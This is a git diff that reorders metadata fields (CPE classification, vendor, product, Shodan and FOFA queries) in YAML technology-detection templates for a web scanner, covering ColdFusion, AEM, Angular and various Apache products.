-# digest: 4a0a00473045022100ea47b3b162a1f01eb7259bbf6552c95dfb369a2715f277d72e0f1489f97afe5c022040e3a919596d8f1ef0f0e07cb26ad7c75167b11686f2f6df8744116e2731f8b7:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100ea47b3b162a1f01eb7259bbf6552c95dfb369a2715f277d72e0f1489f97afe5c022040e3a919596d8f1ef0f0e07cb26ad7c75167b11686f2f6df8744116e2731f8b7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/adobe/adobe-coldfusion-detect.yaml b/http/technologies/adobe/adobe-coldfusion-detect.yaml
index 44c32cbc88..c0752d49e3 100644
--- a/http/technologies/adobe/adobe-coldfusion-detect.yaml
+++ b/http/technologies/adobe/adobe-coldfusion-detect.yaml
@@ -5,16 +5,16 @@ info:
author: philippedelteil
severity: info
description: With this template we can detect the version number of Coldfusion instances based on their logos.
+ classification:
+ cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 6
- shodan-query: http.component:"Adobe ColdFusion"
- product: coldfusion
vendor: adobe
+ product: coldfusion
+ shodan-query: http.component:"Adobe ColdFusion"
tags: adobe,coldfusion,tech
- classification:
- cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -69,4 +69,4 @@ http:
dsl:
- "status_code==200 && (\"cb594e69af5ba15bca453f76aca53615\" == md5(body))"
-# digest: 4a0a00473045022100faa12701b8bc27ab386795db36e16861a6a66b66d8fb9cd15ac80cb9409141df02205a53027693929221e1489f3e72cf8d72c2b6061ffced415bc66e005548780060:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100faa12701b8bc27ab386795db36e16861a6a66b66d8fb9cd15ac80cb9409141df02205a53027693929221e1489f3e72cf8d72c2b6061ffced415bc66e005548780060:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/adobe/adobe-coldfusion-error-detect.yaml b/http/technologies/adobe/adobe-coldfusion-error-detect.yaml
index 5790db3e1b..066515a218 100644
--- a/http/technologies/adobe/adobe-coldfusion-error-detect.yaml
+++ b/http/technologies/adobe/adobe-coldfusion-error-detect.yaml
@@ -7,16 +7,16 @@ info:
description: With this template we can detect a running ColdFusion instance due to an error page.
reference:
- https://twitter.com/PhilippeDelteil/status/1418622775829348358
+ classification:
+ cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.component:"Adobe ColdFusion"
- product: coldfusion
vendor: adobe
+ product: coldfusion
+ shodan-query: http.component:"Adobe ColdFusion"
tags: adobe,coldfusion,tech
- classification:
- cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -33,4 +33,4 @@ http:
status:
- 404
-# digest: 4a0a00473045022068efa69e7486fc3192208ad0e2a27d0f5617cd74743f02d143f7bb64af6556da022100b5540b7df95ff7b71b3394a2f63ddd5e42d5473d8c6febd42195b9fa73496c27:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022068efa69e7486fc3192208ad0e2a27d0f5617cd74743f02d143f7bb64af6556da022100b5540b7df95ff7b71b3394a2f63ddd5e42d5473d8c6febd42195b9fa73496c27:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/aem-detect.yaml b/http/technologies/aem-detect.yaml
index f4b0c6a8f5..6fa89414dd 100644
--- a/http/technologies/aem-detect.yaml
+++ b/http/technologies/aem-detect.yaml
@@ -10,15 +10,15 @@ info:
- https://medium.com/@Asm0d3us/weaponizing-favicon-ico-for-bugbounties-osint-and-what-not-ace3c214e139
- https://github.com/devanshbatham/FavFreak
- https://github.com/sansatart/scrapts/blob/master/shodan-favicon-hashes.csv
- metadata:
- max-request: 1
- shodan-query: http.component:"Adobe Experience Manager"
- product: experience_manager
- vendor: adobe
- tags: aem,favicon,tech,adobe
-
classification:
cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: adobe
+ product: experience_manager
+ shodan-query: http.component:"Adobe Experience Manager"
+ tags: aem,favicon,tech,adobe
+
http:
- method: GET
path:
@@ -31,4 +31,4 @@ http:
dsl:
- "status_code==200 && (\"-144483185\" == mmh3(base64_py(body)))"
-# digest: 4a0a00473045022068f39108481f480fd1abc9ea59b5a8fc42785b0c16552788ceb812e868142992022100f55fce42c653e5e9470940c5a6fcece538e39f3d5ce14e21d83bd7966e6854f5:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022068f39108481f480fd1abc9ea59b5a8fc42785b0c16552788ceb812e868142992022100f55fce42c653e5e9470940c5a6fcece538e39f3d5ce14e21d83bd7966e6854f5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/aerocms-detect.yaml b/http/technologies/aerocms-detect.yaml
index a3127078cd..816f30c844 100644
--- a/http/technologies/aerocms-detect.yaml
+++ b/http/technologies/aerocms-detect.yaml
@@ -4,17 +4,17 @@ info:
name: AeroCMS Detect
author: pikpikcu
severity: info
+ classification:
+ cpe: cpe:2.3:a:aerocms_project:aerocms:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
+ vendor: aerocms_project
+ product: aerocms
shodan-query: title:"AeroCMS"
fofa-query: "AeroCMS"
- product: aerocms
- vendor: aerocms_project
tags: tech,aerocms
- classification:
- cpe: cpe:2.3:a:aerocms_project:aerocms:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -31,4 +31,4 @@ http:
status:
- 200
-# digest: 490a004630440220769bdc680a96232f5286c1c3217977ec05dd2460851ecbfd2056fcc34e384ba602204d2754502f218ade0e566b77987019f64aada581026a8abd9f157ccb378d15ae:922c64590222798bb761d5b6d8e72950
+# digest: 490a004630440220769bdc680a96232f5286c1c3217977ec05dd2460851ecbfd2056fcc34e384ba602204d2754502f218ade0e566b77987019f64aada581026a8abd9f157ccb378d15ae:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/angular-detect.yaml b/http/technologies/angular-detect.yaml
index a918d681a8..9df3523f68 100644
--- a/http/technologies/angular-detect.yaml
+++ b/http/technologies/angular-detect.yaml
@@ -7,16 +7,16 @@ info:
description: Angular is a development platform for building mobile and desktop web applications using Typescript/JavaScript and other languages.
reference:
- https://github.com/angular/angular
+ classification:
+ cpe: cpe:2.3:a:angular:angular:*:*:*:*:node.js:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"ng-version="
- product: angular
vendor: angular
+ product: angular
+ shodan-query: html:"ng-version="
tags: tech,angular
- classification:
- cpe: cpe:2.3:a:angular:angular:*:*:*:*:node.js:*:*:*
http:
- method: GET
path:
@@ -35,4 +35,4 @@ http:
regex:
- 'ng-version="([0-9.]+)"'
-# digest: 4b0a00483046022100c27e4418203c86638e6e00c792093e221ffdaf641129125c28ae3fa6c59fc6c3022100a0584f76ff9fb8e7cd13351c2f8856ad173adf6bd7a6bff20c88e8c0ca0a80ef:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100c27e4418203c86638e6e00c792093e221ffdaf641129125c28ae3fa6c59fc6c3022100a0584f76ff9fb8e7cd13351c2f8856ad173adf6bd7a6bff20c88e8c0ca0a80ef:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/apache/airflow-detect.yaml b/http/technologies/apache/airflow-detect.yaml
index 24ff2e4a76..dd19a01edb 100644
--- a/http/technologies/apache/airflow-detect.yaml
+++ b/http/technologies/apache/airflow-detect.yaml
@@ -4,16 +4,16 @@ info:
name: Apache Airflow
author: pdteam
severity: info
+ classification:
+ cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.html:"Apache Airflow"
- product: airflow
vendor: apache
+ product: airflow
+ shodan-query: http.html:"Apache Airflow"
tags: tech,apache,airflow,intrusive
- classification:
- cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -29,4 +29,5 @@ http:
- type: status
status:
- 404
-# digest: 4a0a00473045022100ed59cfb6802724e34fa5894563277a64889f3676ae6cdae4875a59bfd9e5366a02207589bb03b56a052916e5db355e492f5168909e2051039e97f66022052d90d590:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100ed59cfb6802724e34fa5894563277a64889f3676ae6cdae4875a59bfd9e5366a02207589bb03b56a052916e5db355e492f5168909e2051039e97f66022052d90d590:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/apache/apache-answer-detect.yaml b/http/technologies/apache/apache-answer-detect.yaml
index c6348a58f6..6f3d8b00b6 100644
--- a/http/technologies/apache/apache-answer-detect.yaml
+++ b/http/technologies/apache/apache-answer-detect.yaml
@@ -8,17 +8,17 @@ info:
Detects Apache Answer version through API endpoit
reference:
- https://answer.apache.org/
+ classification:
+ cpe: cpe:2.3:a:apache:answer:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
+ vendor: apache
+ product: answer
shodan-query: http.favicon.hash:523757057
fofa-query: icon_hash="523757057"
- product: answer
- vendor: apache
tags: detect,tech,apache
- classification:
- cpe: cpe:2.3:a:apache:answer:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -46,4 +46,5 @@ http:
name: version
regex:
- '"version":"([^"]+)"'
-# digest: 4a0a004730450221009e8fd14022f6b92bd8f4859cea0b49820934628bc139239ba58c7c4f268a0bf6022064c229196be4da31c1f58e14368f395bf82afcd2e8679e584116bfd400b2dd2c:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a004730450221009e8fd14022f6b92bd8f4859cea0b49820934628bc139239ba58c7c4f268a0bf6022064c229196be4da31c1f58e14368f395bf82afcd2e8679e584116bfd400b2dd2c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/apache/apache-axis-detect.yaml b/http/technologies/apache/apache-axis-detect.yaml
index 1cdab8933b..25138eff1d 100644
--- a/http/technologies/apache/apache-axis-detect.yaml
+++ b/http/technologies/apache/apache-axis-detect.yaml
@@ -5,16 +5,16 @@ info:
author: dogasantos
severity: info
description: Axis and Axis2 detection
+ classification:
+ cpe: cpe:2.3:a:apache:axis:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
- shodan-query: http.html:"Apache Axis"
- product: axis
vendor: apache
+ product: axis
+ shodan-query: http.html:"Apache Axis"
tags: tech,axis2,middleware,apache
- classification:
- cpe: cpe:2.3:a:apache:axis:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -40,4 +40,4 @@ http:
status:
- 200
-# digest: 4b0a00483046022100c038a9ca3babbe0905c9228f2f6a32ccfc217541f7d6d7fa56694398d76d0936022100afe6237444b76f388682bc2b0beeaa1134ac39be09dcc255402add222228036b:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100c038a9ca3babbe0905c9228f2f6a32ccfc217541f7d6d7fa56694398d76d0936022100afe6237444b76f388682bc2b0beeaa1134ac39be09dcc255402add222228036b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/apache/apache-cloudstack-detect.yaml b/http/technologies/apache/apache-cloudstack-detect.yaml
index 2e168fbf59..02ee5c221d 100644
--- a/http/technologies/apache/apache-cloudstack-detect.yaml
+++ b/http/technologies/apache/apache-cloudstack-detect.yaml
@@ -5,20 +5,21 @@ info:
author: pussycat0x
severity: info
description: CloudStack is open-source Infrastructure-as-a-Service cloud computing software for creating, managing, and deploying infrastructure cloud services. It uses existing hypervisor platforms for virtualization, such as KVM, VMware vSphere, including ESXi and vCenter, XenServer/XCP and XCP-ng.
- metadata:
- shodan-query: http.title:"Apache CloudStack"
- product: cloudstack
- vendor: apache
- tags: tech,apache,cloudstack
-
classification:
cpe: cpe:2.3:a:apache:cloudstack:*:*:*:*:*:*:*:*
+ metadata:
+ vendor: apache
+ product: cloudstack
+ shodan-query: http.title:"Apache CloudStack"
+ tags: tech,apache,cloudstack
+
http:
- method: GET
path:
- "{{BaseURL}}"
host-redirects: true
+
matchers-condition: and
matchers:
- type: word
@@ -29,4 +30,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a004730450220268e39fea1438b8ede541f545337c0c6f6027159cbd433c75bd0f9be63877ea6022100b842369be9a18c54da45a39a9f188c687b365eb23b3869afadd42c22b7dbea08:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a004730450220268e39fea1438b8ede541f545337c0c6f6027159cbd433c75bd0f9be63877ea6022100b842369be9a18c54da45a39a9f188c687b365eb23b3869afadd42c22b7dbea08:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/apache/apache-cocoon-detect.yaml b/http/technologies/apache/apache-cocoon-detect.yaml
index f59e8702da..5ba91e2dd3 100644
--- a/http/technologies/apache/apache-cocoon-detect.yaml
+++ b/http/technologies/apache/apache-cocoon-detect.yaml
@@ -4,17 +4,17 @@ info:
name: Apache Cocoon detect
author: ffffffff0x
severity: info
+ classification:
+ cpe: cpe:2.3:a:apache:cocoon:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
+ vendor: apache
+ product: cocoon
shodan-query: http.html:"Apache Cocoon"
fofa-query: app="APACHE-Cocoon"
- product: cocoon
- vendor: apache
tags: apache,cocoon,tech
- classification:
- cpe: cpe:2.3:a:apache:cocoon:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -34,4 +34,4 @@ http:
regex:
- 'X\-Cocoon\-Version:([ 0-9.]+)'
-# digest: 4a0a0047304502207c3d5c05569282470766be7f10fec3c51d0b735651fac58a14d156cfe1b9a315022100ac0031c5ee4914905f47336472e3c56e443937e733b2ae348e006042060158f3:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502207c3d5c05569282470766be7f10fec3c51d0b735651fac58a14d156cfe1b9a315022100ac0031c5ee4914905f47336472e3c56e443937e733b2ae348e006042060158f3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/apache/apache-dubbo-detect.yaml b/http/technologies/apache/apache-dubbo-detect.yaml
index bf2190dd5c..62641fc062 100644
--- a/http/technologies/apache/apache-dubbo-detect.yaml
+++ b/http/technologies/apache/apache-dubbo-detect.yaml
@@ -4,15 +4,15 @@ info:
name: Apache dubbo detect
author: ffffffff0x
severity: info
- metadata:
- max-request: 1
- fofa-query: app="APACHE-dubbo"
- product: dubbo
- vendor: apache
- tags: apache,dubbo,tech
-
classification:
cpe: cpe:2.3:a:apache:dubbo:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: apache
+ product: dubbo
+ fofa-query: app="APACHE-dubbo"
+ tags: apache,dubbo,tech
+
http:
- method: GET
path:
@@ -24,4 +24,4 @@ http:
words:
- "Basic realm=\"dubbo\""
-# digest: 490a0046304402207eab0da9fbf6224308f2509f78c874e04fbc4455c9375f51e7ccca501468294b02207f55571310092ba7d00229e95f7779280d0234242c34b50cacc03f5dd7777311:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402207eab0da9fbf6224308f2509f78c874e04fbc4455c9375f51e7ccca501468294b02207f55571310092ba7d00229e95f7779280d0234242c34b50cacc03f5dd7777311:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/apache/apache-karaf-panel.yaml b/http/technologies/apache/apache-karaf-panel.yaml
index 106ae8c27a..37f99d8963 100644
--- a/http/technologies/apache/apache-karaf-panel.yaml
+++ b/http/technologies/apache/apache-karaf-panel.yaml
@@ -4,16 +4,16 @@ info:
name: Apache Karaf Detect
author: s0obi
severity: info
+ classification:
+ cpe: cpe:2.3:a:apache:karaf:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: realm="karaf"
- product: karaf
vendor: apache
+ product: karaf
+ shodan-query: realm="karaf"
tags: tech,apache,karaf
- classification:
- cpe: cpe:2.3:a:apache:karaf:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -25,4 +25,4 @@ http:
words:
- 'realm="karaf'
-# digest: 4a0a0047304502202851728e6494910ea649f13669b2cee5bc1aee43f144efa79b496fac38663c7a022100ad86df88ceee1fed9ec1d6133ad75c0682c93442a1471137e5f4e19d539d8eba:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502202851728e6494910ea649f13669b2cee5bc1aee43f144efa79b496fac38663c7a022100ad86df88ceee1fed9ec1d6133ad75c0682c93442a1471137e5f4e19d539d8eba:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/apache/apache-ofbiz-detect.yaml b/http/technologies/apache/apache-ofbiz-detect.yaml
index 3ccf78bbe3..106bfac176 100644
--- a/http/technologies/apache/apache-ofbiz-detect.yaml
+++ b/http/technologies/apache/apache-ofbiz-detect.yaml
@@ -6,16 +6,16 @@ info:
severity: info
description: |
An Apache OFBiz instance was detected.
- metadata:
- max-request: 1
- verified: true
- fofa-query: app="Apache_OFBiz"
- product: ofbiz
- vendor: apache
- tags: tech,detect,ofbiz,apache
-
classification:
cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*
+ metadata:
+ verified: true
+ max-request: 1
+ vendor: apache
+ product: ofbiz
+ fofa-query: app="Apache_OFBiz"
+ tags: tech,detect,ofbiz,apache
+
http:
- method: GET
path:
@@ -36,4 +36,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502205d30594f5f64af924626e422439a11d6e24629c45c00ae7205f429e2c4abbbaa022100f70e9d73c15c34ebc36d041cc57695a3fca5428b9d23fe32cec394ec9e74f09b:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502205d30594f5f64af924626e422439a11d6e24629c45c00ae7205f429e2c4abbbaa022100f70e9d73c15c34ebc36d041cc57695a3fca5428b9d23fe32cec394ec9e74f09b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/apache/apache-streampipes-detect.yaml b/http/technologies/apache/apache-streampipes-detect.yaml
index 1974ae46c5..e70b9e1b78 100644
--- a/http/technologies/apache/apache-streampipes-detect.yaml
+++ b/http/technologies/apache/apache-streampipes-detect.yaml
@@ -6,17 +6,17 @@ info:
severity: info
description: |
Checks for the presence of Apache StreamPipes by looking in the body or matching the favicon hash.
- metadata:
- max-request: 3
- verified: true
- shodan-query: title:"apache streampipes"
- fofa-query: title="apache streampipes"
- product: streampipes
- vendor: apache
- tags: tech,apache,streampipes,detect
-
classification:
cpe: cpe:2.3:a:apache:streampipes:*:*:*:*:*:*:*:*
+ metadata:
+ verified: true
+ max-request: 3
+ vendor: apache
+ product: streampipes
+ shodan-query: title:"apache streampipes"
+ fofa-query: title="apache streampipes"
+ tags: tech,apache,streampipes,detect
+
http:
- method: GET
path:
@@ -27,7 +27,6 @@ http:
host-redirects: true
max-redirects: 2
stop-at-first-match: true
-
matchers:
- type: dsl
dsl:
@@ -41,4 +40,5 @@ http:
group: 1
json:
- '.info.version'
-# digest: 4a0a00473045022100e844168305f85d35d0d27540e7184cfcac442f22a9422989e405991f0b9574e702205c83386f56fce761314655189f2f551a2b4b82f7929bd3e46ef8b1fc948db36d:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100e844168305f85d35d0d27540e7184cfcac442f22a9422989e405991f0b9574e702205c83386f56fce761314655189f2f551a2b4b82f7929bd3e46ef8b1fc948db36d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/apache/apache-tapestry-detect.yaml b/http/technologies/apache/apache-tapestry-detect.yaml
index 9260cad651..7ad62a2675 100644
--- a/http/technologies/apache/apache-tapestry-detect.yaml
+++ b/http/technologies/apache/apache-tapestry-detect.yaml
@@ -4,15 +4,15 @@ info:
name: Apache Tapestry Framework detect
author: pikpikcu
severity: info
- metadata:
- max-request: 1
- fofa-query: app="APACHE-Tapestry"
- product: tapestry
- vendor: apache
- tags: apache,tapestry,tech
-
classification:
cpe: cpe:2.3:a:apache:tapestry:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: apache
+ product: tapestry
+ fofa-query: app="APACHE-Tapestry"
+ tags: apache,tapestry,tech
+
http:
- method: GET
path:
@@ -41,4 +41,4 @@ http:
regex:
- 'Tapestry Application Framework, version ([0-9.-A-Z]+)T" \/>'
-# digest: 4a0a00473045022021983fb2759fe6b865d1bb63db76a35fa77e2f2cb323d6d0ad05d68d8fd030b0022100ca8e33fb62a8ae0513e3907d4f6ea8ceb7385076ab71b56efa8e93a52ea19e47:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022021983fb2759fe6b865d1bb63db76a35fa77e2f2cb323d6d0ad05d68d8fd030b0022100ca8e33fb62a8ae0513e3907d4f6ea8ceb7385076ab71b56efa8e93a52ea19e47:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/apache/apache-zeppelin-detect.yaml b/http/technologies/apache/apache-zeppelin-detect.yaml
index 119d24914e..2f3981d312 100644
--- a/http/technologies/apache/apache-zeppelin-detect.yaml
+++ b/http/technologies/apache/apache-zeppelin-detect.yaml
@@ -4,15 +4,15 @@ info:
name: Apache Zeppelin detect
author: pikpikcu
severity: info
- metadata:
- max-request: 1
- fofa-query: app="APACHE-Zeppelin"
- product: zeppelin
- vendor: apache
- tags: apache,zeppelin,tech
-
classification:
cpe: cpe:2.3:a:apache:zeppelin:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: apache
+ product: zeppelin
+ fofa-query: app="APACHE-Zeppelin"
+ tags: apache,zeppelin,tech
+
http:
- method: GET
path:
@@ -29,4 +29,4 @@ http:
status:
- 200
-# digest: 4a0a0047304502203d791bc7d1f6b6d9cbe9a33cfa46484720f9ba0bfa4bb3b5232dd6a80d5eb500022100e04a94c4218234a5dbc0e2a68724d6e1a4e2ce226d8f9f816d37a5826b31f147:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502203d791bc7d1f6b6d9cbe9a33cfa46484720f9ba0bfa4bb3b5232dd6a80d5eb500022100e04a94c4218234a5dbc0e2a68724d6e1a4e2ce226d8f9f816d37a5826b31f147:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/apache/default-apache-test-all.yaml b/http/technologies/apache/default-apache-test-all.yaml
index decf00e308..a367ab8bcd 100644
--- a/http/technologies/apache/default-apache-test-all.yaml
+++ b/http/technologies/apache/default-apache-test-all.yaml
@@ -5,15 +5,15 @@ info:
author: andydoering
severity: info
description: Detects default installations of apache (not just apache2 or installations on CentOS)
- metadata:
- max-request: 1
- shodan-query: http.title:"Apache+Default","Apache+HTTP+Server+Test","Apache2+It+works"
- product: http_server
- vendor: apache
- tags: tech,apache
-
classification:
cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: apache
+ product: http_server
+ shodan-query: http.title:"Apache+Default","Apache+HTTP+Server+Test","Apache2+It+works"
+ tags: tech,apache
+
http:
- method: GET
path:
@@ -33,4 +33,4 @@ http:
kval:
- server
-# digest: 4a0a0047304502200fad5c3674d892aada569aa8cd26f62f74081302d8ae6278e33cc73673a006b1022100b3a392e383707cfed00858361375d438b1ef75d801ce8637a3400e7eaf500f9a:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502200fad5c3674d892aada569aa8cd26f62f74081302d8ae6278e33cc73673a006b1022100b3a392e383707cfed00858361375d438b1ef75d801ce8637a3400e7eaf500f9a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/apache/default-apache-test-page.yaml b/http/technologies/apache/default-apache-test-page.yaml
index f9fdc9ae28..abaa3b1022 100644
--- a/http/technologies/apache/default-apache-test-page.yaml
+++ b/http/technologies/apache/default-apache-test-page.yaml
@@ -4,15 +4,15 @@ info:
name: Apache HTTP Server Test Page
author: dhiyaneshDk
severity: info
- metadata:
- max-request: 1
- shodan-query: http.title:"Apache HTTP Server Test Page powered by CentOS"
- product: http_server
- vendor: apache
- tags: tech,apache
-
classification:
cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: apache
+ product: http_server
+ shodan-query: http.title:"Apache HTTP Server Test Page powered by CentOS"
+ tags: tech,apache
+
http:
- method: GET
path:
@@ -24,4 +24,4 @@ http:
- "Apache HTTP Server Test Page powered by CentOS "
part: body
-# digest: 490a004630440220467bbb3dc60687ff2f264d427b2bbef67eaf91265d2792c09daa9032b6fa344802204ffb8d5ea0e7243efd0a890758cf097189637da7837623d9d55956ef739fc474:922c64590222798bb761d5b6d8e72950
+# digest: 490a004630440220467bbb3dc60687ff2f264d427b2bbef67eaf91265d2792c09daa9032b6fa344802204ffb8d5ea0e7243efd0a890758cf097189637da7837623d9d55956ef739fc474:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/apache/default-apache2-page.yaml b/http/technologies/apache/default-apache2-page.yaml
index 537a73eccf..39e6cc2220 100644
--- a/http/technologies/apache/default-apache2-page.yaml
+++ b/http/technologies/apache/default-apache2-page.yaml
@@ -4,15 +4,15 @@ info:
name: Apache2 Default Test Page
author: dhiyaneshDk
severity: info
- metadata:
- max-request: 1
- shodan-query: http.title:"Apache2 Debian Default Page:"
- product: http_server
- vendor: apache
- tags: tech,apache
-
classification:
cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: apache
+ product: http_server
+ shodan-query: http.title:"Apache2 Debian Default Page:"
+ tags: tech,apache
+
http:
- method: GET
path:
@@ -24,4 +24,4 @@ http:
- "Apache2 Debian Default Page: It works "
part: body
-# digest: 490a00463044022068f196b95fc943781824e0eb9e8d05dc3b07394f47ad12d5f5e07ef4606ca0670220205cd739fda4afdbf9e5f3e941db9a05568effa277b7bdf6153112ed2d1fa918:922c64590222798bb761d5b6d8e72950
+# digest: 490a00463044022068f196b95fc943781824e0eb9e8d05dc3b07394f47ad12d5f5e07ef4606ca0670220205cd739fda4afdbf9e5f3e941db9a05568effa277b7bdf6153112ed2d1fa918:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/apache/ranger-detection.yaml b/http/technologies/apache/ranger-detection.yaml
index c68fd1fcfa..4f02d6dc2f 100644
--- a/http/technologies/apache/ranger-detection.yaml
+++ b/http/technologies/apache/ranger-detection.yaml
@@ -5,15 +5,15 @@ info:
author: For3stCo1d
severity: info
reference: https://github.com/apache/ranger
- metadata:
- max-request: 2
- shodan-query: http.title:"Ranger - Sign In"
- product: ranger
- vendor: apache
- tags: tech,apache,ranger
-
classification:
cpe: cpe:2.3:a:apache:ranger:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 2
+ vendor: apache
+ product: ranger
+ shodan-query: http.title:"Ranger - Sign In"
+ tags: tech,apache,ranger
+
http:
- method: GET
path:
@@ -34,4 +34,4 @@ http:
dsl:
- "status_code==200 && ('1302629996' == mmh3(base64_py(body)))"
-# digest: 4a0a00473045022100c20ddf56af975514e17133890e5c9cab34c0381caaab97a5f5fd94b2a20cad5102203cd2f9263c60fd7d61430687b7c0379123915a783176abd81259dd74a713fe55:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100c20ddf56af975514e17133890e5c9cab34c0381caaab97a5f5fd94b2a20cad5102203cd2f9263c60fd7d61430687b7c0379123915a783176abd81259dd74a713fe55:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/apache/xampp-default-page.yaml b/http/technologies/apache/xampp-default-page.yaml
index bc4c9bc794..682473b183 100644
--- a/http/technologies/apache/xampp-default-page.yaml
+++ b/http/technologies/apache/xampp-default-page.yaml
@@ -4,15 +4,15 @@ info:
name: XAMPP Default Page
author: dhiyaneshDK
severity: info
- metadata:
- max-request: 1
- shodan-query: http.title:"XAMPP"
- product: xampp
- vendor: apachefriends
- tags: tech,php,xampp,apache
-
classification:
cpe: cpe:2.3:a:apachefriends:xampp:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: apachefriends
+ product: xampp
+ shodan-query: http.title:"XAMPP"
+ tags: tech,php,xampp,apache
+
http:
- method: GET
path:
@@ -28,4 +28,4 @@ http:
status:
- 200
-# digest: 490a0046304402201a60e7f06bc64d280757d677728a5afd38c60886dffa3c12336bd8d805f48d990220519fec34d705203098de9ed37e0d375c02942c0d7973df40b8962a849dc9aece:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402201a60e7f06bc64d280757d677728a5afd38c60886dffa3c12336bd8d805f48d990220519fec34d705203098de9ed37e0d375c02942c0d7973df40b8962a849dc9aece:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/appcms-detect.yaml b/http/technologies/appcms-detect.yaml
index 87432ac4fe..922dbe6d34 100644
--- a/http/technologies/appcms-detect.yaml
+++ b/http/technologies/appcms-detect.yaml
@@ -4,15 +4,15 @@ info:
name: AppCms Detect
author: princechaddha
severity: info
- metadata:
- max-request: 1
- shodan-query: http.html:"Powerd by AppCMS"
- product: appcms
- vendor: appcms
- tags: tech,appcms
-
classification:
cpe: cpe:2.3:a:appcms:appcms:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: appcms
+ product: appcms
+ shodan-query: http.html:"Powerd by AppCMS"
+ tags: tech,appcms
+
http:
- method: GET
path:
@@ -36,4 +36,4 @@ http:
regex:
- ''
-# digest: 4a0a004730450220048cb3b4991d02e731d9fce6eea113c4b84e5639f85a867281f1ae48f106f9f8022100e3e48abd4c96c7d584806ba355fb6ac163786e36d4a4768b56c68908ee46e44d:922c64590222798bb761d5b6d8e72950
